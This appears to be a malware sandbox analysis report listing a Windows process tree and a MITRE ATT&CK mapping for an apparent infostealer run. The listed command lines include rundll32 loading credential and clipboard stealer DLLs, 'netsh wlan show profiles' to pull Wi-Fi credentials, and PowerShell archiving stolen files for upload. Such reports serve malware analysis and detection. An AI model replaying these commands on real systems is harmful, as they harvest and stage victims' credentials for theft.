    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3280,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3264 /prefetch:2
    3⤵
    PID:6680
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1816,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3676 /prefetch:3
    3⤵
    PID:6136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1820,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3712 /prefetch:8
    3⤵
    PID:4952
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2656,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3860 /prefetch:1
    3⤵
    PID:2172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2648,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3972 /prefetch:1
    3⤵
    PID:3752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4396 /prefetch:1
    3⤵
    PID:7008
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3872,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4720 /prefetch:1
    3⤵
    PID:7504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4916,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4912 /prefetch:1
    3⤵
    PID:1108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1904,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=5028 /prefetch:8
    3⤵
    PID:7896
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:7836
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:6780
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b735857d-e559-49b6-b15c-b9318ed9a008} 6780 "\\.\pipe\gecko-crash-server-pipe.6780" gpu
      4⤵
      PID:7724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:4704

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5992

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5912

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3352

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D8
1⤵
PID:5816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:576

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5136

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Windows directory
PID:4716
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7288FB02CAA8AFED10124D7D86A0F655
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2352
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSIF7A1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240842921 2 CustomActions!CustomActions.CustomActions.StartApp
    3⤵
    - Drops file in Windows directory
    PID:6548
  - - C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
      "C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      Modifies Control Panel
      PID:6552
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSIFB6B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240843640 8 CustomActions!CustomActions.CustomActions.InstallPing
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1884
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 820720ED358ACB2F23030A0E73AE6B55 C
  2⤵
  PID:4492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5632

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4480

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
1⤵
PID:1888

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4080
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Windows\System32\drivers\etc\hosts"
  2⤵
  PID:5560

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
1⤵
PID:7300
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
  2⤵
  PID:8100
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
    3⤵
    PID:8116
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\565375082730_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4472
- C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
  "C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
  2⤵
  PID:6632
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
  2⤵
  PID:7476
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
    3⤵
    PID:7728
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7992
- C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
  "C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
  2⤵
  PID:7520
- - C:\Windows\system32\audiodg.exe
    "C:\Windows\system32\audiodg.exe"
    3⤵
    PID:1880
- - C:\Windows\system32\msiexec.exe
    "C:\Windows\system32\msiexec.exe"
    3⤵
    PID:3368
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    PID:7332
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
  2⤵
  PID:6972
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
  2⤵
  PID:7352
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
  2⤵
  PID:7928
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
  2⤵
  PID:7752

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
1⤵
PID:7328

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js"
1⤵
PID:7344
- C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr
  "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\Admin\AppData\Local\Secure360 Innovations\V"
  2⤵
  PID:5412

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5684

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
1⤵
PID:7524

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery